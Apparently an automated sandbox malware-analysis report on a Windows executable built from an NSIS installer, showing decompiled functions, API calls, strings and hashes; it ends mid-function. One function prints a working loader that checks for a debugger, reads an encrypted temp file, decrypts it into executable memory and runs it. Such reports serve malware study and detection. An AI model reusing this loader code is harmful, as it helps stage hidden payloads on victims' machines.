                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\TazxfJHRhq.exe" ,00000000,00000000,00000000,00000020), ref: 00403342
                                                                          • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\TazxfJHRhq.exe" ,00000000,00000000,00000000,00000020), ref: 0040334A
                                                                          • lstrcatA.KERNEL32(0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040336A
                                                                          • lstrcatA.KERNEL32(0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 00403375
                                                                          • DeleteFileA.KERNEL32(0079D941,0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040337F
                                                                          • GetModuleFileNameA.KERNEL32(0079E140,00000400), ref: 00403399
                                                                          • lstrcmpiA.KERNEL32(?,u_.exe), ref: 004033AB
                                                                          • CopyFileA.KERNEL32(0079E140,0079D941,00000000), ref: 004033C1
                                                                          • lstrcatA.KERNEL32(0079D940,00409218,0079E140,0079D941,00000000), ref: 004033F9
                                                                          • lstrcatA.KERNEL32(0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403403
                                                                          • lstrcatA.KERNEL32(0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040340E
                                                                          • lstrcatA.KERNEL32(0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403415
                                                                          • CloseHandle.KERNEL32(00000000,0079D940,C:\Users\user\AppData\Local\Temp\,0079D940,0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040342C
                                                                          • GetCurrentProcess.KERNEL32(00000028,?,ADVAPI32.dll,AdjustTokenPrivileges,ADVAPI32.dll,LookupPrivilegeValueA,ADVAPI32.dll,OpenProcessToken), ref: 0040349C
                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 004034D8
                                                                          • ExitProcess.KERNEL32 ref: 004034FB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: lstrcat$File$DirectoryExitProcess$CreateDeleteHandleModuleWindows$CharCloseCommandCopyCurrentInfoInitializeLineNameNextPathTempUninitializelstrcmpilstrcpyn
                                                                          • String ID: /D=$ _?=$ _?=$"$"C:\Users\user\Desktop\TazxfJHRhq.exe" $@y$ADVAPI32.dll$AdjustTokenPrivileges$Au_.exe$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$LookupPrivilegeValueA$NCRC$NSIS Error$OpenProcessToken$SeShutdownPrivilege$\Temp$~nsu.tmp\
                                                                          • API String ID: 3079827372-293403378
                                                                          • Opcode ID: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
                                                                          • Instruction ID: c6ceebf7ae23f53b4317326a2321724ec613524e7e1bbd79e967450880995801
                                                                          • Opcode Fuzzy Hash: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
                                                                          • Instruction Fuzzy Hash: 3B91D370508350BAE7216FA19D0AB6B7E9CEF46716F14047EF541B61D3CBBC9D008AAE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00405301, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 156filestringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 98%
                                                                          			E00405301(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed char _t51;
				signed int _t54;
				signed int _t57;
				signed int _t63;
				signed int _t65;
				void* _t67;
				signed int _t70;
				CHAR* _t72;
				CHAR* _t74;
				char* _t77;

				_t74 = _a4;
				_t37 = E004055AC(__eflags, _t74);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t65 = DeleteFileA(_t74); // executed
					asm("sbb eax, eax");
					_t67 =  ~_t65 + 1;
					 *0x7a3008 =  *0x7a3008 + _t67;
					return _t67;
				}
				_t70 = _a8 & 0x00000001;
				__eflags = _t70;
				_v8 = _t70;
				if(_t70 == 0) {
					L5:
					E004059BF(0x7a0588, _t74);
					__eflags = _t70;
					if(_t70 == 0) {
						E00405513(_t74);
					} else {
						lstrcatA(0x7a0588, "\\*.*");
					}
					lstrcatA(_t74, 0x409010);
					_t72 =  &(_t74[lstrlenA(_t74)]);
					_t37 = FindFirstFileA(0x7a0588,  &_v332);
					__eflags = _t37 - 0xffffffff;
					_a4 = _t37;
					if(_t37 == 0xffffffff) {
						L26:
						__eflags = _v8;
						if(_v8 != 0) {
							_t31 = _t72 - 1;
							 *_t31 =  *(_t72 - 1) & 0x00000000;
							__eflags =  *_t31;
						}
						goto L28;
					} else {
						goto L9;
					}
					do {
						L9:
						_t77 =  &(_v332.cFileName);
						_t49 = E004054F7( &(_v332.cFileName), 0x3f);
						__eflags =  *_t49;
						if( *_t49 != 0) {
							__eflags = _v332.cAlternateFileName;
							if(_v332.cAlternateFileName != 0) {
								_t77 =  &(_v332.cAlternateFileName);
							}
						}
						__eflags =  *_t77 - 0x2e;
						if( *_t77 != 0x2e) {
							L16:
							E004059BF(_t72, _t77);
							_t51 = _v332.dwFileAttributes;
							__eflags = _t51 & 0x00000010;
							if((_t51 & 0x00000010) == 0) {
								SetFileAttributesA(_t74, _t51 & 0x000000fe);
								_t54 = DeleteFileA(_t74);
								__eflags = _t54;
								if(_t54 != 0) {
									E00404D62(0xfffffff2, _t74);
								} else {
									__eflags = _a8 & 0x00000004;
									if((_a8 & 0x00000004) == 0) {
										 *0x7a3008 =  *0x7a3008 + 1;
									} else {
										E00404D62(0xfffffff1, _t74);
										E00405707(_t74, 0);
									}
								}
							} else {
								__eflags = (_a8 & 0x00000003) - 3;
								if(__eflags == 0) {
									E00405301(_t72, __eflags, _t74, _a8);
								}
							}
							goto L24;
						}
						_t63 =  *((intOrPtr*)(_t77 + 1));
						__eflags = _t63;
						if(_t63 == 0) {
							goto L24;
						}
						__eflags = _t63 - 0x2e;
						if(_t63 != 0x2e) {
							goto L16;
						}
						__eflags =  *((char*)(_t77 + 2));
						if( *((char*)(_t77 + 2)) == 0) {
							goto L24;
						}
						goto L16;
						L24:
						_t57 = FindNextFileA(_a4,  &_v332);
						__eflags = _t57;
					} while (_t57 != 0);
					_t37 = FindClose(_a4);
					goto L26;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L28:
						__eflags = _v8;
						if(_v8 == 0) {
							L36:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405C94(_t74);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L36;
							}
							E004054CC(_t74);
							SetFileAttributesA(_t74, 0x80);
							_t37 = RemoveDirectoryA(_t74);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404D62(0xffffffe5, _t74);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L30;
							}
							E00404D62(0xfffffff1, _t74);
							return E00405707(_t74, 0);
						}
						L30:
						 *0x7a3008 =  *0x7a3008 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                                          0x0040530c
                                                                          0x00405310
                                                                          0x00405319
                                                                          0x0040531c
                                                                          0x0040531f
                                                                          0x00405327
                                                                          0x00405329
                                                                          0x0040532a
                                                                          0x00000000
                                                                          0x0040532a
                                                                          0x00405339
                                                                          0x00405339
                                                                          0x0040533c
                                                                          0x0040533f
                                                                          0x00405353
                                                                          0x0040535a
                                                                          0x0040535f
                                                                          0x00405361
                                                                          0x00405371
                                                                          0x00405363
                                                                          0x00405369
                                                                          0x00405369
                                                                          0x0040537c
                                                                          0x00405391
                                                                          0x00405393
                                                                          0x00405399
                                                                          0x0040539c
                                                                          0x0040539f
                                                                          0x00405461
                                                                          0x00405461
                                                                          0x00405465
                                                                          0x00405467
                                                                          0x00405467
                                                                          0x00405467
                                                                          0x00405467
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004053a5
                                                                          0x004053a5
                                                                          0x004053ae
                                                                          0x004053b4
                                                                          0x004053b9
                                                                          0x004053bc
                                                                          0x004053be
                                                                          0x004053c2
                                                                          0x004053c4
                                                                          0x004053c4
                                                                          0x004053c2
                                                                          0x004053c7
                                                                          0x004053ca
                                                                          0x004053dd
                                                                          0x004053df
                                                                          0x004053e4
                                                                          0x004053ea
                                                                          0x004053ec
                                                                          0x00405407
                                                                          0x0040540e
                                                                          0x00405414
                                                                          0x00405416
                                                                          0x0040543b
                                                                          0x00405418
                                                                          0x00405418
                                                                          0x0040541c
                                                                          0x00405430
                                                                          0x0040541e
                                                                          0x00405421
                                                                          0x00405429
                                                                          0x00405429
                                                                          0x0040541c
                                                                          0x004053ee
                                                                          0x004053f4
                                                                          0x004053f6
                                                                          0x004053fc
                                                                          0x004053fc
                                                                          0x004053f6
                                                                          0x00000000
                                                                          0x004053ec
                                                                          0x004053cc
                                                                          0x004053cf
                                                                          0x004053d1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004053d3
                                                                          0x004053d5
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004053d7
                                                                          0x004053db
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00405440
                                                                          0x0040544a
                                                                          0x00405450
                                                                          0x00405450
                                                                          0x0040545b
                                                                          0x00000000
                                                                          0x00405341
                                                                          0x00405341
                                                                          0x00405343
                                                                          0x0040546b
                                                                          0x0040546e
                                                                          0x00405471
                                                                          0x004054c9
                                                                          0x004054c9
                                                                          0x004054c9
                                                                          0x00405473
                                                                          0x00405476
                                                                          0x00405481
                                                                          0x00405486
                                                                          0x00405488
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040548b
                                                                          0x00405496
                                                                          0x0040549d
                                                                          0x004054a3
                                                                          0x004054a5
                                                                          0x00000000
                                                                          0x004054c1
                                                                          0x004054a7
                                                                          0x004054ab
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004054b0
                                                                          0x00000000
                                                                          0x004054b7
                                                                          0x00405478
                                                                          0x00405478
                                                                          0x00000000
                                                                          0x00405478
                                                                          0x00405349
                                                                          0x0040534d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040534d

                                                                          APIs
                                                                          • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\TazxfJHRhq.exe" ,00000000), ref: 0040531F
                                                                          • lstrcatA.KERNEL32(007A0588,\*.*,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\TazxfJHRhq.exe" ,00000000), ref: 00405369
                                                                          • lstrcatA.KERNEL32(?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\TazxfJHRhq.exe" ,00000000), ref: 0040537C
                                                                          • lstrlenA.KERNEL32(?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\TazxfJHRhq.exe" ,00000000), ref: 00405382
                                                                          • FindFirstFileA.KERNEL32(007A0588,?,?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\TazxfJHRhq.exe" ,00000000), ref: 00405393
                                                                          • FindNextFileA.KERNEL32(?,?,000000F2,?), ref: 0040544A
                                                                          • FindClose.KERNEL32(?), ref: 0040545B
                                                                          Strings
                                                                          • "C:\Users\user\Desktop\TazxfJHRhq.exe" , xrefs: 0040530B
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405335
                                                                          • \*.*, xrefs: 00405363
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                          • String ID: "C:\Users\user\Desktop\TazxfJHRhq.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                          • API String ID: 2035342205-3498229369
                                                                          • Opcode ID: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
                                                                          • Instruction ID: f738604874d37791e21c186390ce59424126d5fa43ea1a12c0606eb471faeee6
                                                                          • Opcode Fuzzy Hash: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
                                                                          • Instruction Fuzzy Hash: 5B51E030804A04AADB216F228C49BFF3A78DF82759F14817BF944B51D2C77C5982DE6E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 73791000, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85filememorystringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 75%
                                                                          			E73791000() {
				long _v8;
				short _v528;
				long _t12;
				void* _t16;
				signed char _t31;
				void* _t33;
				long _t36;

				_v8 = 0;
				if(IsDebuggerPresent() != 0) {
					DebugBreak();
				}
				_t12 = GetTempPathW(0x103,  &_v528);
				if(_t12 != 0) {
					lstrcatW( &_v528, L"\\ael13j4hp6ajgnz");
					_t16 = CreateFileW( &_v528, 0x80000000, 7, 0, 3, 0x80, 0); // executed
					_t33 = _t16;
					if(_t33 == 0xffffffff) {
						L12:
						return _t16;
					}
					_t16 = GetFileSize(_t33, 0);
					_t36 = _t16;
					if(_t36 == 0xffffffff) {
						L11:
						goto L12;
					}
					_t16 = VirtualAlloc(0, _t36, 0x3000, 0x40); // executed
					 *0x73793000 = _t16;
					if(_t16 == 0) {
						goto L11;
					}
					_t16 = ReadFile(_t33, _t16, _t36,  &_v8, 0); // executed
					if(_t16 == 0) {
						goto L11;
					}
					_t31 = 0;
					if(_v8 <= 0) {
						L10:
						_t16 =  *0x73793000(); // executed
						goto L11;
					}
					do {
						asm("rol al, 1");
						asm("rol al, 0x2");
						asm("ror al, 0x2");
						 *( *0x73793000 + _t31) = (( ~((( *( *0x73793000 + _t31) ^ _t31 ^ 0x000000c0) + 0x0000000b ^ _t31) + _t31) - _t31 ^ _t31) - _t31 ^ 0x00000025) + 1;
						_t31 = _t31 + 1;
					} while (_t31 < _v8);
					goto L10;
				}
				return _t12;
			}










                                                                          0x73791009
                                                                          0x73791018
                                                                          0x7379101a
                                                                          0x7379101a
                                                                          0x7379102c
                                                                          0x73791034
                                                                          0x73791047
                                                                          0x73791066
                                                                          0x7379106c
                                                                          0x73791071
                                                                          0x737910f7
                                                                          0x00000000
                                                                          0x737910f7
                                                                          0x7379107b
                                                                          0x73791081
                                                                          0x73791086
                                                                          0x737910f6
                                                                          0x00000000
                                                                          0x737910f6
                                                                          0x73791092
                                                                          0x73791098
                                                                          0x7379109f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x737910aa
                                                                          0x737910b2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x737910b4
                                                                          0x737910b9
                                                                          0x737910f0
                                                                          0x737910f0
                                                                          0x00000000
                                                                          0x737910f0
                                                                          0x737910c0
                                                                          0x737910cd
                                                                          0x737910d3
                                                                          0x737910da
                                                                          0x737910e7
                                                                          0x737910ea
                                                                          0x737910eb
                                                                          0x00000000
                                                                          0x737910c0
                                                                          0x737910fb

                                                                          APIs
                                                                          • IsDebuggerPresent.KERNEL32 ref: 73791010
                                                                          • DebugBreak.KERNEL32 ref: 7379101A
                                                                          • GetTempPathW.KERNEL32(00000103,?), ref: 7379102C
                                                                          • lstrcatW.KERNEL32(?,\ael13j4hp6ajgnz), ref: 73791047
                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 73791066
                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 7379107B
                                                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 73791092
                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 737910AA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.220401569.0000000073791000.00000020.00020000.sdmp, Offset: 73790000, based on PE: true
                                                                          • Associated: 00000000.00000002.220397111.0000000073790000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.220405676.0000000073792000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.220411526.0000000073794000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: File$AllocBreakCreateDebugDebuggerPathPresentReadSizeTempVirtuallstrcat
                                                                          • String ID: \ael13j4hp6ajgnz
                                                                          • API String ID: 4020703165-2761218979
                                                                          • Opcode ID: 80365d1e5a8c967f633472baddaf4ac3b30c1a9722327648c7395358831834cf
                                                                          • Instruction ID: 763e3cd5209518c6112f06209167ab0c77c74176ddcd3738565ed638fdddf36d
                                                                          • Opcode Fuzzy Hash: 80365d1e5a8c967f633472baddaf4ac3b30c1a9722327648c7395358831834cf
                                                                          • Instruction Fuzzy Hash: E821E53550120EAEF7207B7A8C8EBEA3F78EB06740F234354E95AE71C1DA38551BD624
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00401FDC, Relevance: 9.1, APIs: 6, Instructions: 72libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 64%
                                                                          			E00401FDC(int __ebx) {
				struct HINSTANCE__* _t20;
				struct HINSTANCE__* _t27;
				int _t28;
				struct HINSTANCE__* _t33;
				CHAR* _t35;
				intOrPtr* _t36;
				void* _t37;

				_t28 = __ebx;
				 *(_t37 - 4) = 1;
				SetErrorMode(0x8001); // executed
				if( *0x7a3030 < __ebx) {
					_push(0xffffffe7);
					goto L14;
				} else {
					_t35 = E00402A9A(0xfffffff0);
					 *(_t37 + 8) = E00402A9A(1);
					if( *((intOrPtr*)(_t37 - 0x14)) == __ebx) {
						L3:
						_t20 = LoadLibraryA(_t35); // executed
						_t33 = _t20;
						if(_t33 == _t28) {
							_push(0xfffffff6);
							L14:
							E00401428();
						} else {
							goto L4;
						}
					} else {
						_t27 = GetModuleHandleA(_t35); // executed
						_t33 = _t27;
						if(_t33 != __ebx) {
							L4:
							_t36 = GetProcAddress(_t33,  *(_t37 + 8));
							if(_t36 == _t28) {
								E00404D62(0xfffffff7,  *(_t37 + 8));
							} else {
								 *(_t37 - 4) = _t28;
								if( *((intOrPtr*)(_t37 - 0x1c)) == _t28) {
									 *_t36( *((intOrPtr*)(_t37 - 8)), 0x400, 0x7a4000, 0x40b018, 0x409000); // executed
								} else {
									E00401428( *((intOrPtr*)(_t37 - 0x1c)));
									if( *_t36() != 0) {
										 *(_t37 - 4) = 1;
									}
								}
							}
							if( *((intOrPtr*)(_t37 - 0x18)) == _t28) {
								FreeLibrary(_t33);
							}
						} else {
							goto L3;
						}
					}
				}
				SetErrorMode(_t28);
				 *0x7a3008 =  *0x7a3008 +  *(_t37 - 4);
				return 0;
			}










                                                                          0x00401fdc
                                                                          0x00401fe4
                                                                          0x00401fe7
                                                                          0x00401ff3
                                                                          0x00402093
                                                                          0x00000000
                                                                          0x00401ff9
                                                                          0x00402001
                                                                          0x0040200b
                                                                          0x0040200e
                                                                          0x0040201d
                                                                          0x0040201e
                                                                          0x00402024
                                                                          0x00402028
                                                                          0x0040208f
                                                                          0x00402095
                                                                          0x00402095
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402010
                                                                          0x00402011
                                                                          0x00402017
                                                                          0x0040201b
                                                                          0x0040202a
                                                                          0x00402034
                                                                          0x00402038
                                                                          0x0040207c
                                                                          0x0040203a
                                                                          0x0040203d
                                                                          0x00402040
                                                                          0x00402070
                                                                          0x00402042
                                                                          0x00402045
                                                                          0x0040204e
                                                                          0x00402050
                                                                          0x00402050
                                                                          0x0040204e
                                                                          0x00402040
                                                                          0x00402084
                                                                          0x00402087
                                                                          0x00402087
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040201b
                                                                          0x0040200e
                                                                          0x0040209b
                                                                          0x00402932
                                                                          0x0040293e

                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 00401FE7
                                                                          • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402011
                                                                            • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                            • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                            • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
                                                                            • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                            • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                            • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                            • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                          • LoadLibraryA.KERNELBASE(00000000,00000001,000000F0), ref: 0040201E
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040202E
                                                                          • FreeLibrary.KERNEL32(00000000,000000F7,?), ref: 00402087
                                                                          • SetErrorMode.KERNEL32 ref: 0040209B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: MessageSend$ErrorLibraryModelstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                          • String ID:
                                                                          • API String ID: 1609199483-0
                                                                          • Opcode ID: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
                                                                          • Instruction ID: 46783d0d57a84ebc5ebfcf140bac70f9b04df1374f396a157ff0b90552cbbe62
                                                                          • Opcode Fuzzy Hash: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
                                                                          • Instruction Fuzzy Hash: 19210B31D04321EBCB216F659E8C95F7A70AF95315B20413BF712B62D1C7BC4A82DA9E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00405C94, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 24fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00405C94(CHAR* _a4) {
				void* _t3;
				void* _t8;

				SetErrorMode(0x8001); // executed
				_t3 = FindFirstFileA(_a4, 0x7a15d0); // executed
				_t8 = _t3; // executed
				SetErrorMode(0); // executed
				if(_t8 == 0xffffffff) {
					return 0;
				}
				FindClose(_t8); // executed
				return 0x7a15d0;
			}





                                                                          0x00405ca2
                                                                          0x00405cae
                                                                          0x00405cb6
                                                                          0x00405cb8
                                                                          0x00405cbd
                                                                          0x00000000
                                                                          0x00405cca
                                                                          0x00405cc0
                                                                          0x00000000

                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\TazxfJHRhq.exe" ), ref: 00405CA2
                                                                          • FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
                                                                          • SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
                                                                          • FindClose.KERNELBASE(00000000), ref: 00405CC0
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C94
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: ErrorFindMode$CloseFileFirst
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 2885216544-3916508600
                                                                          • Opcode ID: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
                                                                          • Instruction ID: 58bb4516a74dc5dde44cdc206f1ac441c4a30f5218be24d725a78a1f01f55fab
                                                                          • Opcode Fuzzy Hash: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
                                                                          • Instruction Fuzzy Hash: 6AE08632B1971057D20057B45D88D0B3AA8D7C5721F100132F211B73D0D5755C114BE5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00403526, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 215stringregistrylibraryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 89%
                                                                          			E00403526() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				int _t42;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t82;
				CHAR* _t84;
				CHAR* _t85;

				_t80 =  *0x7a2f88;
				_t20 = E00405CD2("KERNEL32.dll", "GetUserDefaultUILanguage");
				_t88 = _t20;
				if(_t20 == 0) {
					_t78 = 0x79f580;
					"1033" = 0x7830;
					E004058B3(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x79f580);
					__eflags =  *0x79f580;
					if(__eflags == 0) {
